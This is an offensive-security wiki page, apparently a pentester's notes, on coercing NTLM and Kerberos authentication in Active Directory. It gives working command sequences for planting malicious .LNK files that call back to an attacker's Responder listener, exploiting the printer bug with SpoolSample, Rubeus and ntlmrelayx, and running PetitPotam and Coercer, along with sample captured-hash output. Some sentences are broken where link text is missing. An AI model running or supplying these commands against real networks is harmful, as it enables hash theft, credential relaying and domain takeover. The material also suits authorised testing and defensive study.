Tactics, Techniques, and Procedures
Personal BlogTwitterGitHubContact
  • Tactics, Techniques, and Procedures
  • ☠️Pentesting
    • Fortress
      • Automation
      • Cisco
        • Cisco Adaptive Security Appliance
        • Cisco Smart Install
      • CMS
        • Drupal
        • Wordpress
      • Exchange
      • Office365
      • Okta
      • Outlook Web Access (OWA)
      • SSH
      • Subdomain Takeover
    • Infrastructure
      • Active Directory
        • AD CS
        • Coercing Authentication
        • Credential Dumping
          • Cached Domain Credentials
          • Data Protection API (DPAPI)
          • Group Policy Preferences
          • LSA Secrets
          • LSASS Memory
          • NTDS
          • Security Account Manager (SAM)
          • Kerberos Tickets
          • Unsecured Credentials
          • WDigest
          • WiFi Profiles
        • Delegation Abuse
          • Constrained Delegation
          • Unconstrained Delegation
        • Domain Enumeration
        • Domain Dominance
          • Forge Golden Ticket
          • Forge Silver Ticket
          • Forge Trust Ticket
          • Skeleton Key
        • Group Policy Preferences
        • Kerberos
          • AS-REP Roasting
          • Kerberoasting
          • Kerberos Relaying
        • Lateral Movement
          • PowerShell
          • Windows Remote Management (WinRM)
        • Local Administrator Password Solution (LAPS)
        • NoPac
        • NTLMv1
        • Password Cracking
        • Password Policy
        • Password Spraying
        • Reconnaissance
        • Relaying
          • LDAP Relaying
          • SMB Relaying
        • Shadow Credentials
        • Zerologon
      • Database Management System (DBMS)
        • Microsoft SQL Server
      • Defense Evasion
        • Disable or Modify Tools
        • Disable Windows Event Logging
        • Impair Command History Logging
        • Timestomping
      • Low-Hanging Fruit
      • Networks
        • IPv6
        • LLMNR/NBT-NS Poisoning
        • Network Scanning
        • Network Sniffing
        • Segmentation Testing
        • Simple Network Management Protocol (SNMP)
        • Subnet Enumeration
        • Identifying Domain Information
      • Persistence
        • Create Account
        • Remote Desktop
        • Services
          • Service Privilege Escalation / Persistence
          • Systemd Service Persistence
        • Web Shell
        • DLL Hijacking
      • Pivoting
      • Privilege Escalation
        • Linux
          • Setuid and Setgid
        • Windows
          • Privilege Abuse
            • SeImpersonatePrivilege
            • SeLoadDriverPrivilege
          • Service Exploitation
    • Initial Access
      • Phishing
        • Creating Templates
          • Leveraging AI During Template Creation
        • Payloads
          • Non-malicious Callback
          • Macros
    • OSINT
      • Identifying Users
      • Network Information
      • Search Engines
    • Web Applications
      • Access Control
      • APIs
        • Swagger API
      • Authentication
        • Account Takeover
      • Clickjacking
      • Cross Origin Resource Sharing (CORS)
      • Cross Site Request Forgery (CSRF)
      • Document Object Model (DOM)
      • File Upload
      • Google Dorking
      • GraphQL
      • HTTP Request Smuggling
      • Information Disclosure
      • Insecure Direct Object Reference (IDOR)
      • Injection Vulnerabilities
        • Cross-Site Scripting (XSS)
          • Blind Cross-Site Scripting
          • Finding Cross-Site Scripting
          • Stealing Cookies
          • XSS Payloads
        • CSV Injection
        • XML External Entity Injection (XXE)
        • LDAP Injection
        • NoSQL Injection
        • Server-Side Template Injection
        • SQL Injection
      • JSON Web Tokens (JWT)
      • Local File Inclusion (LFI)
      • OAuth
      • Open Redirection
      • Password Reset Poisoning
      • Prototype Pollution
      • Race Condition
      • Rate Limit Bypass
      • Remote Code Execution (RCE)
      • Remote File Inclusion (RFI)
      • Suspicious Parameters
      • Tooling
        • Burp Suite
          • Authentication / Proxy Issues
          • Intruder Attack Types
          • Match and Replace
          • Quality of Life
        • Misc Tooling
      • WAF Bypasses
      • WebSockets
      • Web Cache Deception
      • Web Cache Poisoning
    • Wireless
      • WPA / WPA2
        • Alfa Troubleshooting
        • Enterprise
        • Personal
    • Cloud
      • Amazon Web Services (AWS)
      • Microsoft Azure
  • 🧨Red Teaming
    • C2
      • Cobalt Strike
      • Empire
      • Metasploit
        • Metasploit Datatabase
      • Mythic
      • Sliver
    • Malware Dev
    • Offensive Infrastructure
      • Cloud Fronting
      • Redirectors
      • OpSec
      • Phishing Infrastructure
      • Creating a Dropbox
    • Offensive Tactics
    • Philosophy
  • 🦋Bug Bounty
    • Bug Bounty Tips & Tricks
  • 📖Resources
    • Blog Posts and Goodies
    • Checklists
    • Offensive Security Notes
    • Tooling Repository
    • Active Directory Toolkit
Powered by GitBook
On this page
  • Harvest NTLMv2/v1 Hashes with Write Access to Shares
  • The Printer Bug
  • PetitPotam
  • Trigger NTLM Authentication over HTTP
  • Coercer
  • References
  1. Pentesting
  2. Infrastructure
  3. Active Directory

Coercing Authentication

PreviousAD CSNextCredential Dumping

Last updated 2 years ago

Harvest NTLMv2/v1 Hashes with Write Access to Shares

The demonstrates performing this attack with CrackMapExec, however, it can also be performed by crafting a custom .LNK file.

1. Enumerate the hosts shares

crackmapexec smb $ip -u $username -p $password --shares

2. Create a malicious .LNK file calling back to your Responder.py IP

crackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=[ResponderIP]

3. After waiting and (hopefully) obtaining several NTLM hashes, cleanup the malicious file

crackmapexec smb $ip -u $username -p $password -M slinky -o NAME=$share SERVER=$responder_ip CLEANUP=True

Notes

  • Put an underscore as the first character in the file name (e.g., NAME=_bonus.xlsx and it will put the file at the top of the directory, making it more likely to render and send a hash to the malicious server.

The Printer Bug

If a machine that we have compromised is configured with we are able to capture any of the TGTs from machines/accounts that have authenticated to it. If we're able to obtain a TGT from a machine account, we can craft service tickets and obtain administrative access to it - this also works for domain controllers.

It should be noted that in order to successfully exploit the printer bug, we must have already obtained a session as or valid domain user credentials.

Enumerate Print Spooler Service

Enumerate Print Spooler service with ItWasAllADream:

# Enumerate Print Spooler with ItWasALlADream
docker run -it itwasalladream -u $username -p $password -d $domain $target -v

# Enumerate with CrackMapExec
crackmapexec smb $ip -u $username -p $password -M spooler

# Enumerate Print Spooler with Impacket
python rpcdump.py @$target | egrep 'MS-RPRN|MS-PAR'

# SpoolerScan.ps1
.\SpoolerScan.ps1

1. We first need to monitor for any new TGTs on the system that has unconstrained delegation configured. Rubeus provides us with the handy functionality to accomplish this:

.\Rubeus.exe monitor /targetuser:$machineaccount /interval:5 /nowrap

2. We can then execute SpoolSample.exe on the host to coerce authentication:

.\SpoolSample.exe $target $attacker

3. After running SpoolSample.exe we should then aobserve a TGT on the attacker controlled system.

Remotely Exploiting the Printer Bug

Alternatively, we can accomplish this same exploitation path remotely using Impacket's ntlmrelayx to relay the credentials:

# Exploiting the Printerbug with Dementor.py
dementor.py -d $domain -u $username -p $password $attackerip $targetfqdn

# Exploiting the Printerbug with Printerbug.py
python printerbug.py $domain/$username:$password@$targetfqdn $attackerip

# Relay the authentication attempt to the target server
 ntlmrelayx.py -smb2support -t smb://$targetx

PetitPotam

1. The tester first identifies all of the domain controllers in the domain, this can be done either through DNS or by identifying common ports associated with DC's such as 88/tcp.

2. Modify the configuration of your Responder installation so that the challenge paramter is set to the following value and run Responder in Analyze mode with the --lm flag to attempt to downgrade the authentication:

# Responder Challenge Attribute
1122334455667788

# Run Responder with 
responder -I $interface -A --lm 

3. The tester can then attempt to force authentication from the domain controllers to the attacker controlled server using PetitPotam:

python3 PetitPotam.py $listenerip $targetip

4. The output received should look like the following:

[SMB] NTLMv1 Client   : 10.0.0.5
[SMB] NTLMv1 Username : OASIS\PARZDC$
[SMB] NTLMv1 Hash     : PARZDC$::OASIS:FFJSFOE[SNIP]
ntlmv1.py --ntlmv1 PARZDC$::OASIS:FFJSFOE[SNIP]

Trigger NTLM Authentication over HTTP

## https://twitter.com/n00py1/status/1481385989025280000?s=20&t=rMzsQI6ENH2SYVVaTYTqAA
Invoke-WebRequest -UseDefaultCredentials

Coercer

# Basic use of Coercer.py
Coercer.py -d $domain -u $username -p $password --listener $attackerip --target $targetip

References

Exploiting the Printer Bug with

While itself has been rendered a little redundant due to tools like Coercer accomplishing the same, yet more. It is still important to discuss as it's still all that's needed to of Active Directory environments. One of the most simple yet effective attack paths with PetitPotam would look like the following:

5. With the NTLMv1 hash now retrieved, the tester can utilize the tool to obtain the appropriate format for cracking:

6. This hash can then be cracked via Hashcat with the instructions displayed on screen or alternatively can be submitted to .

is a Python script which automagically attempt to coerce an arbitrary machine to an attacker controlled device in several ways.

☠️
following example
unconstrained delegation
SpoolSample.exe
Dementor.py
Printerbug.py
PetitPotam
compromise a significant amount
ntlmv1-multi
crack.sh
Coercer
Active Directory Computer Account SMB Relaying Attack - PraetorianPraetorian
Logo